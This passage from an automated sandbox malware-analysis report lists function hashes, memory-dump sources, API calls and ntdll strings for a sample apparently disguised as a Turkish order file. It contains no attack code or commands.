Opcode Fuzzy Hash: b343aaf5011dadfa2d4d2463f30dbb9c3368ff0a84d56a66ee321ca9b2364c5b
Instruction Fuzzy Hash: A9514F74E002598FDB14CFA9C9805AEFBF2BF89305F6481A9D418AB355D7319D42CFA1

Function 06C33750 Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d58a8b1594014e5a4afb2e9640a68de0f05d05bafa981a5ef7125840078a4f91
Instruction ID: a61e9ec4736387bd2454f8866d1ccccd556228343c9a7c16f973e96a8de3bb84
Opcode Fuzzy Hash: d58a8b1594014e5a4afb2e9640a68de0f05d05bafa981a5ef7125840078a4f91
Instruction Fuzzy Hash: 37513B75E002598FDB14DFA9C5805AEFBF2FF89301F2481AAD418AB356D7309942CFA1

Function 00D825D8 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1403797213.0000000000D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d80000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7afbf5bddce12c7d39a1d4fcab0f7b8c51e24bc6d250e5cecc45bf0f0da14495
Instruction ID: 299bc2b8c07b58bbeac47ea7b67c6beed1bb86451d7b5c8b81b126e033c54f5c
Opcode Fuzzy Hash: 7afbf5bddce12c7d39a1d4fcab0f7b8c51e24bc6d250e5cecc45bf0f0da14495
Instruction Fuzzy Hash: AA31B47140D685EBDB122F6E4C355D53BE0EE2773872647C3C194855EAF7104466D33A

Function 06C37E92 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1420823065.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c30000_Siparis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b50c4f923b91032a5ee8f7958e378eec5338df7e883b5e9f5f94ef3a03f58018
Instruction ID: fa86f2a8548f3d9e6828400b4faa6e5c71b3c8012d74699c0990b65e62a908ce
Opcode Fuzzy Hash: b50c4f923b91032a5ee8f7958e378eec5338df7e883b5e9f5f94ef3a03f58018
Instruction Fuzzy Hash: 09F05E7495E160CFEB608B95A9554F8BBB8EB4F341B0020D6E40ED3212C7344A4ACBA5

Analysis Process: Siparis. 000867000960 TAVSAN order_Optium A.s 03.07.2024.exePID: 7920, Parent PID: 7728COMMON

Execution Graph

Execution Coverage:	1.2%
Dynamic/Decrypted Code Coverage:	5.3%
Signature Coverage:	8.4%
Total number of Nodes:	131
Total number of Limit Nodes:	7

Executed Functions

Function 00417893 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417905

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
Instruction ID: 0a139a47e173eaad41d0b07f10b71808cd494ea23b68c50335989f7951ff83c9
Opcode Fuzzy Hash: ebd3c5d2265a916cd2496e5eef1ce8dc7d6870324b8f3176294337ca5bb7e159
Instruction Fuzzy Hash: 4E015EB1E0020DBBDF10EAE1DC42FDEB778AB14308F00819AE90897240F675EB588B95

Function 0042B463 Relevance: 1.5, APIs: 1, Instructions: 25
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtClose.NTDLL(?), ref: 0042B49A

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
Instruction ID: cc1e1af18163018d145a0d33b3d19fc0af47ca19ac32231b8af92158e85f1dff
Opcode Fuzzy Hash: 024f7506f13a32ece6b1676215f5119d665d863506ea31102a3387a4627870a5
Instruction Fuzzy Hash: 2AE04F726012547BD620EA6ADC41F9F776CDBC5715F404429FA0CA7142CA74B91186A4

Function 01402B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01402B6A

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
Instruction ID: f7abb23741fb9631f90feba312cfc9c607e7d2b337425d0ce8d941c3e46450b8
Opcode Fuzzy Hash: 6642049f536dd82acabbe04f0f1e1d615c32893709fc4dcc2c9256c47680ab88
Instruction Fuzzy Hash: 4C90027224240103410571584414616500A97F1241B55C022E1014591DC73589916225

Function 01402DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01402DFA

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
Instruction ID: f5e6ed4886cc5ef95be3475614219ccbdc8723122e8b6fd04ba2f711a0c1abc2
Opcode Fuzzy Hash: 95a2c798df9ddaa05638e30f6d79b8ffcea2b1aeddd04a0066dfc8f9d1f29805
Instruction Fuzzy Hash: 6590023224140513D11171584504707100997E1281F95C413A0424559DD7668A52A221

Function 01402C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 01402C7A

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4775b3088d1328c213039eebf3540b22108f12532a3b449980743b35cd6388e8
Instruction ID: be69cc9455e01c74c08b05459a173eb290fec0238755d42d11526a71eff1a902
Opcode Fuzzy Hash: 4775b3088d1328c213039eebf3540b22108f12532a3b449980743b35cd6388e8
Instruction Fuzzy Hash: E790023224148903D1107158840474A100597E1341F59C412A4424659DC7A589917221

Function 014035C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 014035CA

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
Instruction ID: 40f2871b52f63c88f4cc1c547e67aebb1aa290b211a99a4ba27bdc265d11c441
Opcode Fuzzy Hash: fd67095d56fb4e412ef187d791e7ada900a7d43b49f031a5efa22d159e8d1974
Instruction Fuzzy Hash: 4190023264550503D10071584514706200597E1241F65C412A0424569DC7A58A5166A2

Function 00413DF1 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7454168B, xrefs: 00413F41, 00413F44
7454168B, xrefs: 00413F2F, 00413F39, 00413F4A

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID:
String ID: 7454168B$7454168B
API String ID: 0-2062695193
Opcode ID: 9fbef162f4b4a14f8d2e2c362b3a071e4f58e2bfdfd9c824d60b6a1d41156583
Instruction ID: 33df3f10e50ff8a84b2dd90542786e367f1cea822781abc0421f895828f9012d
Opcode Fuzzy Hash: 9fbef162f4b4a14f8d2e2c362b3a071e4f58e2bfdfd9c824d60b6a1d41156583
Instruction Fuzzy Hash: 1C115BB6D0035876D702EBE48C82DEEB77C9B81344F4580A5F900AB242C63C8E4387A5

Function 00413E48 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A

Strings

7454168B, xrefs: 00413F41, 00413F44
7454168B, xrefs: 00413F2F, 00413F39, 00413F4A

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 7454168B$7454168B
API String ID: 1836367815-2062695193
Opcode ID: 87bf6aeb18af4ce73bdb4161bdea6bf8d0f4a00d99e452a21a40984fd4dab32d
Instruction ID: b9c09223bc78e0d71d65946f2e3709651324493d7ae557fee3cf1ade0007dd7a
Opcode Fuzzy Hash: 87bf6aeb18af4ce73bdb4161bdea6bf8d0f4a00d99e452a21a40984fd4dab32d
Instruction Fuzzy Hash: 1F1104B2E40258BBDB019BA09C81DEF777CDF81358B4580AAF904BB241D6785F478BA1

Function 00413EBB Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A

Strings

7454168B, xrefs: 00413F41, 00413F44
7454168B, xrefs: 00413F2F, 00413F39, 00413F4A

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 7454168B$7454168B
API String ID: 1836367815-2062695193
Opcode ID: 49413a200532d4a212613a90e1414bee851342012923d8c76184ee4e3fe99309
Instruction ID: e529bda212cb015b1356e0af7e23d4eb82a34ef9c3b0b4a674708c5262d7881d
Opcode Fuzzy Hash: 49413a200532d4a212613a90e1414bee851342012923d8c76184ee4e3fe99309
Instruction Fuzzy Hash: BA0108B2D0025C7AEB10ABD18C81DEFBB7CDF40794F448069FA0477241D6785F068BA1

Function 00413EC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60
threadwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

PostThreadMessageW.USER32(7454168B,00000111,00000000,00000000), ref: 00413F3A

Strings

7454168B, xrefs: 00413F41, 00413F44
7454168B, xrefs: 00413F2F, 00413F39, 00413F4A

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: MessagePostThread
String ID: 7454168B$7454168B
API String ID: 1836367815-2062695193
Opcode ID: 537b35400ce6796e681fdafa769aa210e0aa3690fcb74ac34eebb090422fd416
Instruction ID: ccc3fcebc50fd798af19e781a12fc22c9293f22c44f34a6dac6323ea4733d3cc
Opcode Fuzzy Hash: 537b35400ce6796e681fdafa769aa210e0aa3690fcb74ac34eebb090422fd416
Instruction Fuzzy Hash: 0E01C4B2D0025C7ADB11AAE19C81DEF7B7CDF41698F4480A9FA04B7241D6784F0687A2

Function 0042B7C3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B802

Strings

AfA, xrefs: 0042B7C6

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: FreeHeap
String ID: AfA
API String ID: 3298025750-3160769474
Opcode ID: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
Instruction ID: 7ef677becf297fda1d0aa561dc97d6623694d6679125481b63f908958323e487
Opcode Fuzzy Hash: d5932aee73a0d6f69a1b071cec0428c5042f8ca814df286e9bbcf67385a24a0d
Instruction Fuzzy Hash: C5E06DB26046147BD610EE69EC41EDB33ACDFC9710F404019F90CA7242CA70B91187B5

Function 0042B773 Relevance: 1.5, APIs: 1, Instructions: 29
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(?,0041E09B,?,?,00000000,?,0041E09B,?,?,?), ref: 0042B7B2

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
Instruction ID: b6b2865531f7d642e7a2aceaeda34a3b9ad03a66bb5b7dad3da1dcf270cbfd86
Opcode Fuzzy Hash: e34e10abe938de23fd7b1e4c9f01118daf07397e550868144535cd1bcd6f19bf
Instruction Fuzzy Hash: 29E092B26042147BDB10EF69EC45FDB37ACEFC9710F104019FA18A7242DA70B91087B5

Function 0042B813 Relevance: 1.5, APIs: 1, Instructions: 25
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(?,00000000,?,?,AF9D693A,?,?,AF9D693A), ref: 0042B84A

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 450c6bab94ba090d12a405e63f7726f7082dff4fb0e659ab5c12cd34315764ff
Instruction ID: ecc152096029c2ce991c06a4793f92afd01a601ada9a49821f32715e59e30a4e
Opcode Fuzzy Hash: 450c6bab94ba090d12a405e63f7726f7082dff4fb0e659ab5c12cd34315764ff
Instruction Fuzzy Hash: 01E04676200214BBD620AA6AEC41FAB77ACEBC5714F40402AFA08A7241DA79B91087B4

Function 00417924 Relevance: 1.5, APIs: 1, Instructions: 15
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417905

Memory Dump Source

Source File: 00000005.00000002.1607201928.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Siparis.jbxd

Yara matches

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
Instruction ID: 108bd6b119bfb7ed73351027258f9a8d149220eb69821cdf5170675373698fcd
Opcode Fuzzy Hash: 673c8fe58901bd7f44c5f398775d49de7805e1f1010d5d71a948d0a6eebb35e1
Instruction Fuzzy Hash: 68D02EB668D20E8FC701CB2CE857B88FBB8AB10304F0501CACC946B290C63162C68B26

Function 01402C0A Relevance: 1.5, APIs: 1, Instructions: 8
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 01402C24

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 1e320a9ea66599f702d2d6d06155f93e89861376777ee25ace27e05de27ef9de
Instruction ID: f7ae57726dff1accf26e7671f30ec185056b83aacb99261c53af988e5ef58f91
Opcode Fuzzy Hash: 1e320a9ea66599f702d2d6d06155f93e89861376777ee25ace27e05de27ef9de
Instruction Fuzzy Hash: BBB09B729455C5C6DA12E764460CB17790077D1741F15C077D3030697F8778C1D1E275

Non-executed Functions

Function 01442349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON

Download Yara Rule

Strings

GlobalFlag2, xrefs: 01442FC0
MinimumStackCommitInBytes, xrefs: 01442BB0
RaiseExceptionOnPossibleDeadlock, xrefs: 01442579
@, xrefs: 01442B74
CFGOptions, xrefs: 01442967
LdrpInitializeExecutionOptions, xrefs: 0144317D
TracingFlags, xrefs: 01442549
MaxDeadActivationContexts, xrefs: 01442D82
GlobalFlag, xrefs: 01442F3F, 01443059
UnloadEventTraceDepth, xrefs: 014424C0
UseImpersonatedDeviceMap, xrefs: 0144251C
DisableHeapLookaside, xrefs: 0144246D
minkernel\ntdll\ldrinit.c, xrefs: 01443187
FrontEndHeapDebugOptions, xrefs: 01442489
MaxLoaderThreads, xrefs: 014424EC
ExecuteOptions, xrefs: 014425A0
@, xrefs: 01442942
DisableExceptionChainValidation, xrefs: 0144275F
ShutdownFlags, xrefs: 014424A1
Initializing the application verifier package failed with status 0x%08lx, xrefs: 01443176

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
API String ID: 0-2160512332
Opcode ID: b6dcdf71b19df8c2e5a7a560cc7eabf0b739a353064f7258061398de8faf61fd
Instruction ID: 36f1a6b6b415294cb149a845d3cf68390ba879e0512bb520b5686c3483b1019e
Opcode Fuzzy Hash: b6dcdf71b19df8c2e5a7a560cc7eabf0b739a353064f7258061398de8faf61fd
Instruction Fuzzy Hash: A8929D71604342ABF721DF19D880F6BBBE8BB84754F04492EFA94973A1D7B0E845CB52

Function 013F8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON

Download Yara Rule

Strings

corrupted critical section, xrefs: 014354C2
Address of the debug info found in the active list., xrefs: 014354AE, 014354FA
Critical section address, xrefs: 01435425, 014354BC, 01435534
undeleted critical section in freed memory, xrefs: 0143542B
Thread is in a state in which it cannot own a critical section, xrefs: 01435543
Invalid debug info address of this critical section, xrefs: 014354B6
Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0143540A, 01435496, 01435519
First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014354E2
double initialized or corrupted critical section, xrefs: 01435508
Critical section debug info address, xrefs: 0143541F, 0143552E
Thread identifier, xrefs: 0143553A
Critical section address., xrefs: 01435502
8, xrefs: 014352E3
Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 014354CE

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
API String ID: 0-2368682639
Opcode ID: 053d3082e0c8832e478d96589d38290f7443e531c5aac7620cab36a868081716
Instruction ID: 36ae91e0a511ca1e3db328dc2ea9d168ea5bc30b3e2fc61bdbffc02cdd499f35
Opcode Fuzzy Hash: 053d3082e0c8832e478d96589d38290f7443e531c5aac7620cab36a868081716
Instruction Fuzzy Hash: EF819FB0A40358AFDB20CF9AC845BAEBBB5FB48718F60455EF604BB790D375A941CB50

Function 013F29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON

Download Yara Rule

Strings

@, xrefs: 0143259B
SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01432412
SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01432602
SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 014322E4
SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 014324C0
SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 014325EB
RtlpResolveAssemblyStorageMapEntry, xrefs: 0143261F
SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01432409
SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01432624
SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01432506
SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01432498

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
API String ID: 0-4009184096
Opcode ID: 804c7696bc1e24d835fc46b5c332caacad4fe520ac24c87695ea62bdce22ddf1
Instruction ID: e8d82384cf26b42aae37c350d4a2f903ca0eb71c35e6abb8f4035bf7f7dc9d14
Opcode Fuzzy Hash: 804c7696bc1e24d835fc46b5c332caacad4fe520ac24c87695ea62bdce22ddf1
Instruction Fuzzy Hash: 2F026FF1D002299BDB21DB59CC80B9AB7B8AF58308F4041EAE749A7251D771AF84CF59

Function 01468B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

lsass.exe, xrefs: 01468BA1
csrss.exe, xrefs: 01468B80
runtimebroker.exe, xrefs: 01468B73
SegmentHeap, xrefs: 01468BE9
smss.exe, xrefs: 01468B8B
DefaultBrowser_NOPUBLISHERID, xrefs: 01468D00
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 01468BD0
svchost.exe, xrefs: 01468B68
services.exe, xrefs: 01468B96
heapType, xrefs: 01468BCB

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: b407f8cc628836cdb0b60c52faec79d797416ea9c01e85a4304ff38d9a8fa9c2
Instruction ID: 6d40fbe9f6ed752c367b4ff8ffd7da39082065470cd39ac290c3645d4ab63177
Opcode Fuzzy Hash: b407f8cc628836cdb0b60c52faec79d797416ea9c01e85a4304ff38d9a8fa9c2
Instruction Fuzzy Hash: AD51E5711143029BC725DF198844BABBBECEFA4648F14051EE998C72A4E770D509CB93

Function 013DAD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON

Download Yara Rule

Strings

LdrpInitializeDllPath, xrefs: 014280AD
minkernel\ntdll\ldrapi.c, xrefs: 01428086, 014283BC
minkernel\ntdll\ldrfind.c, xrefs: 014282E1
Status: 0x%08lx, xrefs: 014282D0, 014283AB
LdrGetDllHandleEx, xrefs: 0142807C, 014283B2
LdrpFindLoadedDllInternal, xrefs: 014282D7
DLL search path passed in externally: %ws, xrefs: 014280A6
minkernel\ntdll\ldrutil.c, xrefs: 014280B7
DLL name: %wZ, xrefs: 01428075

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
API String ID: 0-3197712848
Opcode ID: b6b16c6009780ded0fd6c3130d1f03fb42fabb3cd159980804ee452666b7bee1
Instruction ID: a83ee82f54954e1d7cb673c5d6cca206fa673db3783abaf77a3fe6a3dca22191
Opcode Fuzzy Hash: b6b16c6009780ded0fd6c3130d1f03fb42fabb3cd159980804ee452666b7bee1
Instruction Fuzzy Hash: AA122472A083568BD320DF28D980BABB7E8FF81708F45055EF9859B3A1E734D944CB52

Function 01470274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0147069F
HEAP[%wZ]: , xrefs: 01470399, 014704A8, 014705D0, 01470675, 014706CC
HEAP: , xrefs: 014703A6, 014704B5, 014705DD, 01470682, 014706D9
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 014704D3
Just reallocated block at %p to %Ix bytes, xrefs: 014705F1
About to reallocate block at %p to %Ix bytes, xrefs: 014703BA
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 014706EA
RtlReAllocateHeap, xrefs: 014702BF, 01470362

Memory Dump Source

Source File: 00000005.00000002.1607976712.0000000001390000.00000040.00001000.00020000.00000000.sdmp, Offset: 01390000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_1390000_Siparis.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: 3c676bf0206c2f1b7f6ae33e983b0c381e9bfde9823737ec729d28af6970b875
Instruction ID: 5b6d39c7877282758af1200fb84d3fcac2713e2c2c41adf7eb5cceb469eb107a
Opcode Fuzzy Hash: 3c676bf0206c2f1b7f6ae33e983b0c381e9bfde9823737ec729d28af6970b875
Instruction Fuzzy Hash: CBD1DD31501686DFDB22DF69C490AEABBF1FF5A608F08805AF5459B762D7349981CB10

Function 014489B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

HandleTraces, xrefs: 01448C8F
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01448A67
VerifierDlls, xrefs: 01448CBD
VerifierDebug, xrefs: 01448CA5
AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01448A3D
VerifierFlags, xrefs: 01448C50
